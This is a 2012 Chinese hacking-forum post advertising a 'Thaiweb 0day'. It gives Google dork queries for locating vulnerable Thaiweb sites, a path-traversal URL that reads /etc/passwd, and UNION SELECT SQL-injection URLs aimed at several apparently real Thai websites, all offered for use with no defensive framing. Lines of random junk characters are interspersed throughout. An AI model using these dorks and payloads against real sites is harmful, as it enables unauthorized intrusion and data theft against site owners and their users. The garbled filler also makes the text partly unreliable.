中国网络渗透测试联盟
标题:
Thaiweb远程文件sql注入漏洞0day
[打印本页]
作者:
admin
时间:
2012-12-27 08:38
标题:
Thaiweb远程文件sql注入漏洞0day
Google之:
6 D, D( l" b9 [9 U: A' o
; n$ A3 k- F8 y4 n o* |% O
intext:powered by Thaiweb
) F5 N9 ]9 x& _
; t( ?# s$ Z% k. Z0 Z/ x$ j- B z
inurl:index.php?page=board.php
% M3 r) f) E' D8 U8 S- E
5 L# H1 i+ U4 @9 r
* K# {2 }$ Y( h5 x* C! M$ s/ W
6 w/ M$ {# {6 A. z
利用点1:
http://www.xfack.com/index.php?p ... ../../../etc/passwd
' F% \) g y E" b5 y, h3 e1 K' P
7 u- o; V; @8 G" H
$ q( V7 Y3 f. d6 D, D- R% e9 c. @
3 Z* H" {: y& d9 S6 a* v. [" g
利用点2:
http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
8 g. U6 M+ U& C4 q" A5 g
2 B' p& B& q! W- y
: d2 e7 n" p2 K9 E* m
* K0 K0 ^ N+ q1 M8 p# Q% J) x5 m- f
http://www.keytasin.com//index.p ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
3 X+ O: c8 U, m* y, ?4 x, g' G
; m/ s! q+ z9 _5 o% N
http://www.autopartnerthailand.c ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# @& x) T2 f. y# K, c' f
+ {9 P- r; o9 Q8 G( I' U. P
http://gift.in.th/index.php?page ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
( r7 d( {7 I0 H- b7 E
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2